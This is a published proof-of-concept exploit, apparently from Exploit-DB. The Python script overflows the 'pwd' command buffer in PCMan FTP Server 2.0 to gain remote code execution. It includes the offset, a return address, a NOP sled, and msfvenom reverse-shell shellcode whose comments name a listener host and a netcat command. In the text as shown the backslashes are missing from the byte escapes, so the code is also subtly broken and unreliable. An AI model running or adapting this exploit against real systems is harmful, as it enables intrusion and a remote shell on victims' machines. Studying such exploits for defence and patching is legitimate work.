Authored by Waqas Ahmed Faroouqi

PCMan FTP Server version 2.0 pwn remote buffer overflow exploit.

# Exploit Title: PCMan FTP Server 2.0 - 'pwd' Remote Buffer Overflow
# Date: 09/25/2023
# Exploit Author: Waqas Ahmed Faroouqi (ZEROXINN)
# Vendor Homepage: http://pcman.openfoundry.org/
# Software Link: https://www.exploit-db.com/apps/9fceb6fefd0f3ca1a8c36e97b6cc925d-PCMan.7z
# Version: 2.0
# Tested on: Windows XP SP3

#!/usr/bin/python

import socket

#buffer = 'A' * 2500
#offset = 2007
#badchars=x00x0ax0d
#return_address=0x7e429353 (USER32.dll)
#msfvenom -p windows/shell_reverse_tcp LHOST=192.168.146.130 LPORT=4444 EXITFUNC=thread -f c -b "x00x0ax0d"
#nc -nvlp 4444

overflow = (
"xdbxcexd9x74x24xf4xbaxc1x93x3axccx58x31xc9"
"xb1x52x31x50x17x03x50x17x83x01x97xd8x39x7d"
"x70x9exc2x7dx81xffx4bx98xb0x3fx2fxe9xe3x8f"
"x3bxbfx0fx7bx69x2bx9bx09xa6x5cx2cxa7x90x53"
"xadx94xe1xf2x2dxe7x35xd4x0cx28x48x15x48x55"
"xa1x47x01x11x14x77x26x6fxa5xfcx74x61xadxe1"
"xcdx80x9cxb4x46xdbx3ex37x8ax57x77x2fxcfx52"
"xc1xc4x3bx28xd0x0cx72xd1x7fx71xbax20x81xb6"
"x7dxdbxf4xcex7dx66x0fx15xffxbcx9ax8dxa7x37"
"x3cx69x59x9bxdbxfax55x50xafxa4x79x67x7cxdf"
"x86xecx83x0fx0fxb6xa7x8bx4bx6cxc9x8ax31xc3"
"xf6xccx99xbcx52x87x34xa8xeexcax50x1dxc3xf4"
"xa0x09x54x87x92x96xcex0fx9fx5fxc9xc8xe0x75"
"xadx46x1fx76xcex4fxe4x22x9exe7xcdx4ax75xf7"
"xf2x9exdaxa7x5cx71x9bx17x1dx21x73x7dx92x1e"
"x63x7ex78x37x0ex85xebxf8x67x17x6dx90x75x17"
"x63x3dxf3xf1xe9xadx55xaax85x54xfcx20x37x98"
"x2ax4dx77x12xd9xb2x36xd3x94xa0xafx13xe3x9a"
"x66x2bxd9xb2xe5xbex86x42x63xa3x10x15x24x15"
"x69xf3xd8x0cxc3xe1x20xc8x2cxa1xfex29xb2x28"
"x72x15x90x3ax4ax96x9cx6ex02xc1x4axd8xe4xbb"
"x3cxb2xbex10x97x52x46x5bx28x24x47xb6xdexc8"
"xf6x6fxa7xf7x37xf8x2fx80x25x98xd0x5bxeexb8"
"x32x49x1bx51xebx18xa6x3cx0cxf7xe5x38x8fxfd"
"x95xbex8fx74x93xfbx17x65xe9x94xfdx89x5ex94"
"xd7")

shellcode = 'A' * 2007 + "x53x93x42x7e" + "x90" * 32 + overflow

# Change IP/Port as required

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
print "nSending evil buffer..."
s.connect(('192.168.146.135',21))
data = s.recv(1024)
s.send('USER anonymous' +'rn')
data = s.recv(1024)
s.send('PASS anonymousrn')
s.send('pwd ' + shellcode + 'rn')
s.close()
print "nExploit completed successfully!."
except:
print "Could not connect to FTP!"